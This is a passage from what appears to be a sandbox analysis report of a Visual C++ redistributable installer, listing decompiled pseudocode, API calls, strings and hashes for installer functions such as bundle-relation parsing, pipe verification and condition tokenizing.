                                                                          0x0003cd5c
                                                                          0x0003cd66
                                                                          0x0003cd71
                                                                          0x0003cd76
                                                                          0x0003cd79
                                                                          0x00000000
                                                                          0x0003cd79
                                                                          0x0003cd2c
                                                                          0x0003cd2c
                                                                          0x00000000
                                                                          0x0003cd2c
                                                                          0x0003ccdc
                                                                          0x0003ccdc
                                                                          0x0003cced
                                                                          0x0003ccf7
                                                                          0x0003cd02
                                                                          0x0003cd07
                                                                          0x00000000
                                                                          0x0003cd07
                                                                          0x0003ccbd
                                                                          0x0003ccbd
                                                                          0x0003ce42
                                                                          0x0003ce42
                                                                          0x0003ce43
                                                                          0x0003ce49
                                                                          0x0003cc77
                                                                          0x0003cc77
                                                                          0x0003cc88
                                                                          0x0003cc92
                                                                          0x0003cc9d
                                                                          0x0003cca2
                                                                          0x0003cd0a
                                                                          0x0003cd0a
                                                                          0x0003ce18
                                                                          0x0003ce18
                                                                          0x0003ce19
                                                                          0x0003ce1e
                                                                          0x0003cec3
                                                                          0x0003cc3e
                                                                          0x0003cc3e
                                                                          0x0003cc4b
                                                                          0x0003cc50
                                                                          0x0003cc55
                                                                          0x0003cc56
                                                                          0x0003cc5c
                                                                          0x0003cec8
                                                                          0x0003cecd
                                                                          0x0003cecd
                                                                          0x0003ced4
                                                                          0x0003ceda
                                                                          0x0003cedf
                                                                          0x0003cedf
                                                                          0x0003cee6
                                                                          0x0003cee6
                                                                          0x0003cef2

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0003D34C,?,?,?), ref: 0003CC6A
                                                                          • GetLastError.KERNEL32(?,?,0003D34C,?,?,?), ref: 0003CC77
                                                                          • ReleaseMutex.KERNEL32(?), ref: 0003CEDF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                          • String ID: %ls_mutex$%ls_send$@Met$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                          • API String ID: 3944734951-3002565421
                                                                          • Opcode ID: 9f5ff471ab93dbdc1b16342f564f8c8e932fc48aa54357528d8522a578b76284
                                                                          • Instruction ID: 2052250b4cc57358e8ddfb5f45de559a70e4011890a2fe141337ea6411ae9e8e
                                                                          • Opcode Fuzzy Hash: 9f5ff471ab93dbdc1b16342f564f8c8e932fc48aa54357528d8522a578b76284
                                                                          • Instruction Fuzzy Hash: BB71B472A41711BBE7229B658C49F9B7AE8EF04350F018225FD08EB291D7789D5087E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001E936 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 231COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E0001E936(void* __edi, intOrPtr _a4, int _a8) {
				signed int _v8;
				int _v12;
				void* _v16;
				void* _v20;
				char _v24;
				intOrPtr* _t82;
				intOrPtr _t108;
				intOrPtr* _t125;
				intOrPtr* _t126;
				intOrPtr _t141;
				void* _t143;

				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_t143 = E00053803(_a8, L"RelatedBundle",  &_v16);
				if(_t143 >= 0) {
					_t82 = _v16;
					_t124 =  *_t82;
					_t143 =  *((intOrPtr*)( *_t82 + 0x20))(_t82,  &_v24);
					if(_t143 >= 0) {
						_a8 = 0;
						if(_v24 > 0) {
							_t141 = _a4;
							while(1) {
								_t143 = E00053760(_t124, _v16,  &_v20, 0);
								if(_t143 < 0) {
									break;
								}
								_t143 = E000531C7(_v20, L"Action",  &_v12);
								if(_t143 < 0) {
									_push("Failed to get @Action.");
									goto L32;
								} else {
									_t143 = E000531C7(_v20, L"Id",  &_v8);
									if(_t143 < 0) {
										_push("Failed to get @Id.");
										goto L32;
									} else {
										if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Detect", 0xffffffff) != 2) {
											if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Upgrade", 0xffffffff) != 2) {
												if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Addon", 0xffffffff) != 2) {
													if(CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Patch", 0xffffffff) != 2) {
														_t143 = 0x80070057;
														E0005012F(0x80070057, "Invalid value for @Action: %ls", _v12);
													} else {
														_t143 = E000138F6( *(_t141 + 0x34) + 1, _t141 + 0x30, _t141 + 0x30,  *(_t141 + 0x34) + 1, 4, 5);
														if(_t143 < 0) {
															_push("Failed to resize Patch code array in registration");
															goto L32;
														} else {
															_t124 =  *((intOrPtr*)(_t141 + 0x30));
															 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) +  *(_t141 + 0x34) * 4)) = _v8;
															_v8 = _v8 & 0x00000000;
															 *(_t141 + 0x34) =  *(_t141 + 0x34) + 1;
															goto L22;
														}
													}
												} else {
													_t143 = E000138F6( *(_t141 + 0x2c) + 1, _t141 + 0x28, _t141 + 0x28,  *(_t141 + 0x2c) + 1, 4, 5);
													if(_t143 < 0) {
														_push("Failed to resize Addon code array in registration");
														goto L32;
													} else {
														_t124 =  *((intOrPtr*)(_t141 + 0x28));
														 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) +  *(_t141 + 0x2c) * 4)) = _v8;
														_v8 = _v8 & 0x00000000;
														 *(_t141 + 0x2c) =  *(_t141 + 0x2c) + 1;
														goto L22;
													}
												}
											} else {
												_t143 = E000138F6( *(_t141 + 0x24) + 1, _t141 + 0x20, _t141 + 0x20,  *(_t141 + 0x24) + 1, 4, 5);
												if(_t143 < 0) {
													_push("Failed to resize Upgrade code array in registration");
													goto L32;
												} else {
													_t124 =  *((intOrPtr*)(_t141 + 0x20));
													 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x20)) +  *(_t141 + 0x24) * 4)) = _v8;
													_v8 = _v8 & 0x00000000;
													 *(_t141 + 0x24) =  *(_t141 + 0x24) + 1;
													goto L22;
												}
											}
										} else {
											_t143 = E000138F6( *(_t141 + 0x1c) + 1, _t141 + 0x18, _t141 + 0x18,  *(_t141 + 0x1c) + 1, 4, 5);
											if(_t143 < 0) {
												_push("Failed to resize Detect code array in registration");
												L32:
												_push(_t143);
												E0005012F();
											} else {
												_t124 =  *((intOrPtr*)(_t141 + 0x18));
												 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x18)) +  *(_t141 + 0x1c) * 4)) = _v8;
												_v8 = _v8 & 0x00000000;
												 *(_t141 + 0x1c) =  *(_t141 + 0x1c) + 1;
												L22:
												_t108 = _a8 + 1;
												_a8 = _t108;
												if(_t108 < _v24) {
													continue;
												} else {
												}
											}
										}
									}
								}
								goto L34;
							}
							_push("Failed to get next RelatedBundle element.");
							goto L32;
						}
					} else {
						_push("Failed to get RelatedBundle element count.");
						goto L2;
					}
				} else {
					_push("Failed to get RelatedBundle nodes");
					L2:
					_push(_t143);
					E0005012F();
				}
				L34:
				_t125 = _v16;
				if(_t125 != 0) {
					 *((intOrPtr*)( *_t125 + 8))(_t125);
				}
				_t126 = _v20;
				if(_t126 != 0) {
					 *((intOrPtr*)( *_t126 + 8))(_t126);
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t143;
			}














                                                                          0x0001e94c
                                                                          0x0001e94f
                                                                          0x0001e952
                                                                          0x0001e955
                                                                          0x0001e958
                                                                          0x0001e960
                                                                          0x0001e964
                                                                          0x0001e978
                                                                          0x0001e980
                                                                          0x0001e985
                                                                          0x0001e989
                                                                          0x0001e992
                                                                          0x0001e998
                                                                          0x0001e9a5
                                                                          0x0001e9a8
                                                                          0x0001e9b6
                                                                          0x0001e9ba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001e9d1
                                                                          0x0001e9d5
                                                                          0x0001eb5d
                                                                          0x00000000
                                                                          0x0001e9db
                                                                          0x0001e9ec
                                                                          0x0001e9f0
                                                                          0x0001eb56
                                                                          0x00000000
                                                                          0x0001e9f6
                                                                          0x0001ea0c
                                                                          0x0001ea56
                                                                          0x0001eaa0
                                                                          0x0001eae3
                                                                          0x0001eb41
                                                                          0x0001eb4c
                                                                          0x0001eae5
                                                                          0x0001eaf7
                                                                          0x0001eafb
                                                                          0x0001eb37
                                                                          0x00000000
                                                                          0x0001eafd
                                                                          0x0001eb00
                                                                          0x0001eb06
                                                                          0x0001eb09
                                                                          0x0001eb0d
                                                                          0x00000000
                                                                          0x0001eb0d
                                                                          0x0001eafb
                                                                          0x0001eaa2
                                                                          0x0001eab4
                                                                          0x0001eab8
                                                                          0x0001eb30
                                                                          0x00000000
                                                                          0x0001eaba
                                                                          0x0001eabd
                                                                          0x0001eac3
                                                                          0x0001eac6
                                                                          0x0001eaca
                                                                          0x00000000
                                                                          0x0001eaca
                                                                          0x0001eab8
                                                                          0x0001ea58
                                                                          0x0001ea6a
                                                                          0x0001ea6e
                                                                          0x0001eb29
                                                                          0x00000000
                                                                          0x0001ea74
                                                                          0x0001ea77
                                                                          0x0001ea7d
                                                                          0x0001ea80
                                                                          0x0001ea84
                                                                          0x00000000
                                                                          0x0001ea84
                                                                          0x0001ea6e
                                                                          0x0001ea0e
                                                                          0x0001ea20
                                                                          0x0001ea24
                                                                          0x0001eb22
                                                                          0x0001eb69
                                                                          0x0001eb69
                                                                          0x0001eb6a
                                                                          0x0001ea2a
                                                                          0x0001ea2d
                                                                          0x0001ea33
                                                                          0x0001ea36
                                                                          0x0001ea3a
                                                                          0x0001eb10
                                                                          0x0001eb13
                                                                          0x0001eb14
                                                                          0x0001eb1a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001eb20
                                                                          0x0001eb1a
                                                                          0x0001ea24
                                                                          0x0001ea0c
                                                                          0x0001e9f0
                                                                          0x00000000
                                                                          0x0001eb71
                                                                          0x0001eb64
                                                                          0x00000000
                                                                          0x0001eb64
                                                                          0x0001e98b
                                                                          0x0001e98b
                                                                          0x00000000
                                                                          0x0001e98b
                                                                          0x0001e966
                                                                          0x0001e966
                                                                          0x0001e96b
                                                                          0x0001e96b
                                                                          0x0001e96c
                                                                          0x0001e972
                                                                          0x0001eb72
                                                                          0x0001eb72
                                                                          0x0001eb77
                                                                          0x0001eb7c
                                                                          0x0001eb7c
                                                                          0x0001eb7f
                                                                          0x0001eb84
                                                                          0x0001eb89
                                                                          0x0001eb89
                                                                          0x0001eb90
                                                                          0x0001eb95
                                                                          0x0001eb95
                                                                          0x0001eb9e
                                                                          0x0001eba3
                                                                          0x0001eba3
                                                                          0x0001ebaf

                                                                          APIs
                                                                            • Part of subcall function 000531C7: VariantInit.OLEAUT32(?), ref: 000531DD
                                                                            • Part of subcall function 000531C7: SysAllocString.OLEAUT32(?), ref: 000531F9
                                                                            • Part of subcall function 000531C7: VariantClear.OLEAUT32(?), ref: 00053280
                                                                            • Part of subcall function 000531C7: SysFreeString.OLEAUT32(00000000), ref: 0005328B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0005CA64,?,?,Action,?,?,?,00000000,0001533D), ref: 0001EA07
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0001EA51
                                                                          Strings
                                                                          • comres.dll, xrefs: 0001EA1A
                                                                          • Failed to resize Patch code array in registration, xrefs: 0001EB37
                                                                          • Patch, xrefs: 0001EAD1
                                                                          • Failed to get RelatedBundle element count., xrefs: 0001E98B
                                                                          • Invalid value for @Action: %ls, xrefs: 0001EB46
                                                                          • Failed to get RelatedBundle nodes, xrefs: 0001E966
                                                                          • Addon, xrefs: 0001EA8E
                                                                          • Failed to get next RelatedBundle element., xrefs: 0001EB64
                                                                          • version.dll, xrefs: 0001EA64
                                                                          • RelatedBundle, xrefs: 0001E944
                                                                          • Failed to get @Action., xrefs: 0001EB5D
                                                                          • Upgrade, xrefs: 0001EA44
                                                                          • Action, xrefs: 0001E9C4
                                                                          • Failed to resize Addon code array in registration, xrefs: 0001EB30
                                                                          • Failed to get @Id., xrefs: 0001EB56
                                                                          • Failed to resize Detect code array in registration, xrefs: 0001EB22
                                                                          • cabinet.dll, xrefs: 0001EAAE
                                                                          • Failed to resize Upgrade code array in registration, xrefs: 0001EB29
                                                                          • Detect, xrefs: 0001E9F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$CompareVariant$AllocClearFreeInit
                                                                          • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                          • API String ID: 702752599-259800149
                                                                          • Opcode ID: 4b353794735de727d83910261e6e1c0f0b12d5e52d285c0ead866c7115eaef07
                                                                          • Instruction ID: 0d9b96727cad031dfa078fdd011c22f52c022805f09a239b1680aa70d3fdf6a3
                                                                          • Opcode Fuzzy Hash: 4b353794735de727d83910261e6e1c0f0b12d5e52d285c0ead866c7115eaef07
                                                                          • Instruction Fuzzy Hash: CE71A034A48666BBDB10CB54CC81EEEB7B5FF04725F244254ED12AB6C1D731AE90CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000244E7 Relevance: 38.7, APIs: 10, Strings: 12, Instructions: 181fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E000244E7(void* _a4, short* _a8, intOrPtr* _a12) {
				struct _OVERLAPPED* _v8;
				void _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				long _t26;
				intOrPtr _t41;
				intOrPtr* _t66;
				void* _t69;
				void* _t70;
				void* _t71;

				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t26 = GetCurrentProcessId();
				_t69 = _a4;
				_v28 = _t26;
				_v24 = 0;
				if(ReadFile(_t69,  &_v12, 4,  &_v16, 0) != 0) {
					_t31 = _v12 >> 1;
					if(_v12 >> 1 <= 0xff) {
						_t71 = E00011EDE( &_v8, _t31 + 1);
						if(_t71 >= 0) {
							if(ReadFile(_t69, _v8, _v12,  &_v16, 0) != 0) {
								if(CompareStringW(0, 0, _v8, 0xffffffff, _a8, 0xffffffff) == 2) {
									if(ReadFile(_t69,  &_v20, 4,  &_v16, 0) != 0) {
										_t66 = _a12;
										_t41 =  *_t66;
										if(_t41 != 0) {
											if(_t41 == _v20) {
												goto L15;
											} else {
												_t70 = 0x8007000d;
												_t71 = 0x8007000d;
												E000137D3(_t41, "pipe.cpp", 0x36d, 0x8007000d);
												_push("Verification process id from parent does not match.");
												goto L4;
											}
										} else {
											 *_t66 = _v20;
											L15:
											if(WriteFile(_t69,  &_v28, 4,  &_v24, 0) == 0) {
												_t74 =  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
												_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t47 & 0x0000ffff | 0x80070000;
												E000137D3(0x80004005, "pipe.cpp", 0x373, _t71);
												_push("Failed to inform parent process that child is running.");
												goto L17;
											}
										}
									} else {
										_t77 =  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
										_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t53 & 0x0000ffff | 0x80070000;
										E000137D3(0x80004005, "pipe.cpp", 0x362, _t71);
										_push("Failed to read verification process id from parent pipe.");
										goto L17;
									}
								} else {
									_t70 = 0x8007000d;
									_t71 = 0x8007000d;
									E000137D3(_t37, "pipe.cpp", 0x35c, 0x8007000d);
									_push("Verification secret from parent does not match.");
									goto L4;
								}
							} else {
								_t80 =  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
								_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t57 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "pipe.cpp", 0x355, _t71);
								_push("Failed to read verification secret from parent pipe.");
								goto L17;
							}
						} else {
							_push("Failed to allocate buffer for verification secret.");
							goto L17;
						}
					} else {
						_t70 = 0x8007000d;
						_t71 = 0x8007000d;
						E000137D3(_t31, "pipe.cpp", 0x34d, 0x8007000d);
						_push("Verification secret from parent is too big.");
						L4:
						_push(_t70);
						goto L18;
					}
				} else {
					_t83 =  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
					_t71 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t61 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "pipe.cpp", 0x347, _t71);
					_push("Failed to read size of verification secret from parent pipe.");
					L17:
					_push(_t71);
					L18:
					E0005012F();
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t71;
			}















                                                                          0x000244f2
                                                                          0x000244f5
                                                                          0x000244f8
                                                                          0x000244fb
                                                                          0x000244fe
                                                                          0x00024504
                                                                          0x00024508
                                                                          0x00024514
                                                                          0x00024523
                                                                          0x00024560
                                                                          0x00024567
                                                                          0x00024596
                                                                          0x0002459a
                                                                          0x000245b7
                                                                          0x00024608
                                                                          0x0002463c
                                                                          0x00024673
                                                                          0x00024676
                                                                          0x0002467a
                                                                          0x000246ef
                                                                          0x00000000
                                                                          0x000246f1
                                                                          0x000246f1
                                                                          0x00024701
                                                                          0x00024703
                                                                          0x00024708
                                                                          0x00000000
                                                                          0x00024708
                                                                          0x0002467c
                                                                          0x0002467f
                                                                          0x00024681
                                                                          0x00024696
                                                                          0x000246a9
                                                                          0x000246b3
                                                                          0x000246c1
                                                                          0x000246c6
                                                                          0x00000000
                                                                          0x000246c6
                                                                          0x00024696
                                                                          0x0002463e
                                                                          0x0002464f
                                                                          0x00024659
                                                                          0x00024667
                                                                          0x0002466c
                                                                          0x00000000
                                                                          0x0002466c
                                                                          0x0002460a
                                                                          0x0002460a
                                                                          0x0002461a
                                                                          0x0002461c
                                                                          0x00024621
                                                                          0x00000000
                                                                          0x00024621
                                                                          0x000245b9
                                                                          0x000245ca
                                                                          0x000245d4
                                                                          0x000245e2
                                                                          0x000245e7
                                                                          0x00000000
                                                                          0x000245e7
                                                                          0x0002459c
                                                                          0x0002459c
                                                                          0x00000000
                                                                          0x0002459c
                                                                          0x00024569
                                                                          0x00024569
                                                                          0x00024579
                                                                          0x0002457b
                                                                          0x00024580
                                                                          0x00024585
                                                                          0x00024585
                                                                          0x00000000
                                                                          0x00024585
                                                                          0x00024525
                                                                          0x00024536
                                                                          0x00024540
                                                                          0x0002454e
                                                                          0x00024553
                                                                          0x000246cb
                                                                          0x000246cb
                                                                          0x000246cc
                                                                          0x000246cc
                                                                          0x000246d2
                                                                          0x000246d7
                                                                          0x000246dc
                                                                          0x000246dc
                                                                          0x000246e9

                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 000244FE
                                                                          • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 0002451F
                                                                          • GetLastError.KERNEL32(?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 00024525
                                                                          • WriteFile.KERNEL32(feclient.dll,?,00000004,000249FE,00000000,?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 0002468E
                                                                          • GetLastError.KERNEL32(?,000249FE,0005B4D8,?,feclient.dll,00000000,?,?), ref: 00024698
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$CurrentProcessReadWrite
                                                                          • String ID: @Met$Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                          • API String ID: 3008747291-3169506970
                                                                          • Opcode ID: 67d83f21934d2cbe85b5b4c30c3e9623570ffe360ce5c2d56f8dd44b1f5f618a
                                                                          • Instruction ID: d3dd1b99ea26004ff27bf92d5c27e589e6d127e1d1beaab67aebd8a07089f813
                                                                          • Opcode Fuzzy Hash: 67d83f21934d2cbe85b5b4c30c3e9623570ffe360ce5c2d56f8dd44b1f5f618a
                                                                          • Instruction Fuzzy Hash: AB51C272A40725BBE7219AA59C85FBFB6EDAB05B10F114126FE01EB190D7748E0086E6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00018E48 Relevance: 37.2, APIs: 8, Strings: 13, Instructions: 433COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E00018E48(int _a4) {
				short _v8;
				signed int _v12;
				int _v16;
				char _v20;
				signed int _t127;
				void* _t128;
				void* _t132;
				void* _t134;
				void* _t135;
				void* _t139;
				void* _t141;
				void* _t142;
				void* _t144;
				void* _t147;
				void* _t148;
				int _t155;
				int _t161;
				void* _t166;
				short* _t175;
				int _t179;
				short* _t181;
				void* _t194;
				void* _t195;
				signed int _t197;
				void* _t198;
				signed int _t199;
				void* _t204;
				int _t209;
				signed int _t210;
				signed short* _t213;
				int _t214;
				void* _t217;
				void _t219;
				void* _t220;
				void* _t223;
				int _t229;
				void* _t231;
				void* _t232;
				void* _t234;
				void* _t236;
				int _t237;
				int _t238;
				void* _t246;

				_t209 = _a4;
				_v8 = 0;
				_t237 = 0;
				_t3 = _t209 + 0x18; // 0x19801
				E00030499(_t3);
				_t4 = _t209 + 0x10; // 0x197f9
				_t223 = _t4;
				_v16 = 2;
				_t210 = 8;
				memset(_t223, 0, _t210 << 2);
				_t7 = _t209 + 8; // 0x560005db
				if(0 !=  *((intOrPtr*)( *_t7))) {
					while(1) {
						_t9 = _t209 + 8; // 0x560005db
						GetStringTypeW(1,  *_t9, 1,  &_v8);
						if((_v8 & 0x00000040) == 0) {
							break;
						}
						 *(_t209 + 8) =  &(( *(_t209 + 8))[1]);
						_t15 = _t209 + 8; // 0x560005db
						if(0 !=  *((intOrPtr*)( *_t15))) {
							continue;
						}
						break;
					}
					_t16 = _t209 + 0x10; // 0x197f9
					_t223 = _t16;
				}
				_t17 = _t209 + 8; // 0x560005db
				_t213 =  *_t17;
				_t18 = _t209 + 4; // 0x70680f79
				_v12 = _t213 -  *_t18 >> 1;
				_t127 =  *_t213 & 0x0000ffff;
				_t246 = _t127 - 0x3c;
				if(_t246 > 0) {
					_t128 = _t127 - 0x3d;
					if(_t128 == 0) {
						 *_t223 = 0x10009;
						goto L25;
					} else {
						_t132 = _t128 - 1;
						if(_t132 == 0) {
							_t134 = (_t213[1] & 0x0000ffff) - 0x3c;
							if(_t134 == 0) {
								 *_t223 = 0x1000b;
								goto L98;
							} else {
								_t135 = _t134 - 1;
								if(_t135 == 0) {
									 *_t223 = 0x10008;
									goto L98;
								} else {
									if(_t135 == 1) {
										 *_t223 = 0x1000d;
										goto L98;
									} else {
										 *_t223 = 0x10006;
										goto L25;
									}
								}
							}
						} else {
							if(_t132 == 0x40) {
								_t139 = (_t213[1] & 0x0000ffff) - 0x3c;
								if(_t139 == 0) {
									_t141 = (_t213[2] & 0x0000ffff) - 0x3c;
									if(_t141 == 0) {
										 *_t223 = 0x3000c;
										goto L88;
									} else {
										_t142 = _t141 - 1;
										if(_t142 == 0) {
											 *_t223 = 0x30007;
											goto L88;
										} else {
											if(_t142 == 1) {
												 *_t223 = 0x3000a;
												goto L88;
											} else {
												 *_t223 = 0x30005;
												goto L98;
											}
										}
									}
									goto L89;
								} else {
									_t144 = _t139 - 1;
									if(_t144 == 0) {
										 *_t223 = 0x30009;
										goto L98;
									} else {
										_t145 = _t144 == 1;
										if(_t144 == 1) {
											_t147 = (_t213[2] & 0x0000ffff) - 0x3c;
											if(_t147 == 0) {
												 *_t223 = 0x3000b;
												goto L88;
											} else {
												_t148 = _t147 - 1;
												if(_t148 == 0) {
													 *_t223 = 0x30008;
													goto L88;
												} else {
													if(_t148 == 1) {
														 *_t223 = 0x3000d;
														L88:
														_push(3);
													} else {
														 *_t223 = 0x30006;
														goto L98;
													}
												}
											}
											goto L89;
										} else {
											_t238 = 0x8007000d;
											 *(_t209 + 0x30) = 1;
											_t229 = 0x8007000d;
											E000137D3(_t145, "condition.cpp", 0x23f, 0x8007000d);
											_push(_v12);
											_t108 = _t209 + 4; // 0x70680f79
											_push( *_t108);
											_push("Failed to parse condition \"%ls\". Unexpected \'~\' operator at position %d.");
											goto L72;
										}
									}
								}
							} else {
								goto L33;
							}
						}
					}
				} else {
					if(_t246 == 0) {
						_t194 = (_t213[1] & 0x0000ffff) - 0x3c;
						if(_t194 == 0) {
							 *_t223 = 0x1000c;
							goto L98;
						} else {
							_t195 = _t194 - 1;
							if(_t195 == 0) {
								 *_t223 = 0x10007;
								goto L98;
							} else {
								if(_t195 == 1) {
									 *_t223 = 0x1000a;
									L98:
									_push(2);
									L89:
									_pop(_t237);
								} else {
									 *_t223 = 0x10005;
									L25:
									_t237 = 1;
								}
							}
						}
						_t229 = 0;
						goto L101;
					} else {
						_t229 = 0;
						_t197 = _t127;
						if(_t197 == 0) {
							 *_t223 = 1;
							goto L101;
						} else {
							_t198 = _t197 - 0x22;
							if(_t198 == 0) {
								while(1) {
									_t237 = _t237 + 1;
									_t199 = _t213[_t237] & 0x0000ffff;
									if(0 == _t199) {
										break;
									}
									_t236 = 0x22;
									if(_t236 != _t199) {
										continue;
									} else {
										_t237 = _t237 + 1;
										 *_t223 = 0x12;
										_t22 = _t237 - 2; // 0x0
										_t23 =  &(_t213[1]); // 0x560005dd
										goto L16;
									}
									goto L102;
								}
								_t238 = 0x8007000d;
								 *(_t209 + 0x30) = 1;
								_t229 = 0x8007000d;
								E000137D3(_t199, "condition.cpp", 0x27f, 0x8007000d);
								_push(_v12);
								_t29 = _t209 + 4; // 0x70680f79
								_push( *_t29);
								_push("Failed to parse condition \"%ls\". Unterminated literal at position %d.");
								goto L72;
							} else {
								_t204 = _t198 - 6;
								if(_t204 == 0) {
									 *_t223 = 0xe;
									goto L12;
								} else {
									if(_t204 != 1) {
										L33:
										_t224 = _v8;
										if((_t224 & 0x00000004) != 0) {
											L60:
											_t231 = 0x5f;
											while(1) {
												_t237 = _t237 + 1;
												_t155 = GetStringTypeW(1,  &(_t213[_t237]), 1,  &_v8);
												if((_v8 & 0x00000100) != 0) {
													break;
												}
												_t88 = _t209 + 8; // 0x560005db
												_t213 =  *_t88;
												if(_t231 == _t213[_t237]) {
													break;
												} else {
													if((_v8 & 0x00000004) != 0) {
														continue;
													} else {
														 *(_t209 + 0x10) = 0x10;
														asm("xorps xmm0, xmm0");
														asm("movlpd [ebp-0x10], xmm0");
														if(E000128CD(_t213, _t237,  &_v20) >= 0) {
															_t100 = _t209 + 0x18; // 0x19801
															_t161 = E000302B0(_t100, _v20, _v16);
															goto L17;
														} else {
															_t238 = 0x8007000d;
